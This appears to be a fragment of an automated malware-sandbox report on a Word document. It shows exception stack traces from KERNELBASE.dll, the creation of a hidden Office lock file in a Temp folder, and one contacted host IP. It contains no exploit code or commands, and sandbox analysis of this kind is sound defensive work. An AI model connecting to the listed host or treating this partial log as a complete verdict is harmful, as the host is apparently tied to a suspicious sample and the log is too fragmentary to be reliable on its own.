__exception__

stacktrace:

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 3362340
registers.edi: 1953561104
registers.eax: 3362340
registers.ebp: 3362420
registers.edx: 0
registers.ebx: 6176556
registers.esi: 2147944126
registers.ecx: 2841257112
1 0 0

__exception__

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 3362032
registers.edi: 1953561104
registers.eax: 3362032
registers.ebp: 3362112
registers.edx: 0
registers.ebx: 6176772
registers.esi: 2147944122
registers.ecx: 2841257112
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$onsarekingogthejunglewhorulestheentireforestandlionsgreattounderstandtheyaregreattoundersetandlionsarekindofthejungle__lionsarekingofjungle.doc
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x000003ec
filepath: C:\Users\test22\AppData\Local\Temp\~$onsarekingogthejunglewhorulestheentireforestandlionsgreattounderstandtheyaregreattoundersetandlionsarekindofthejungle__lionsarekingofjungle.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$onsarekingogthejunglewhorulestheentireforestandlionsgreattounderstandtheyaregreattoundersetandlionsarekindofthejungle__lionsarekingofjungle.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
host 67.207.166.175